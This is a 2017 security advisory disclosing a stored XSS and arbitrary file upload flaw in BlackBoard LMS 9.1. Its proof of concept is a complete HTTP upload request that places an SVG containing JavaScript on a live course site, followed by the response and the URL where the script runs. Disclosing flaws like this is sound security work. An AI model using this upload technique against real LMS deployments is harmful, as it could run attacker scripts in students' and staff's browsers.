BlackBoard LMS 9.1.140152.0 XSS / File Upload
Posted on 29 August 2017
Document Title: =============== BlackBoard LMS 9.1 (9.1.140152.0) Stored XSS/Arbitrary File Upload Product Description: =============== The Learning Management System has changed the way students and educators interact. Blackboard's LMS solutions offer much more than simple, classroom interaction, they support the entire education experience enabling educators to not only interact, but truly engage their students in learning. Homepage: http://www.blackboard.com/learning-management-system/index.aspx PoC: =============== POST /webapps/Bb-sites-user-profile-BBLEARN/uploadAvatar.do HTTP/1.1 Host: www.coursesites.com ------WebKitFormBoundaryMB47ytMHFUAG9AAt Content-Disposition: form-data; name="avatarFile"; filename="badsv2.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("ismail1337"); </script> </svg> ------WebKitFormBoundaryMB47ytMHFUAG9AAt-- Response: {"success":true,"message":"/bbcswebdav/users/your_user_id/public_html/badsv2.svg"} Navigate to the returned URL path: https://www.coursesites.com/bbcswebdav/users/your_user_id /public_html/badsv2.svg
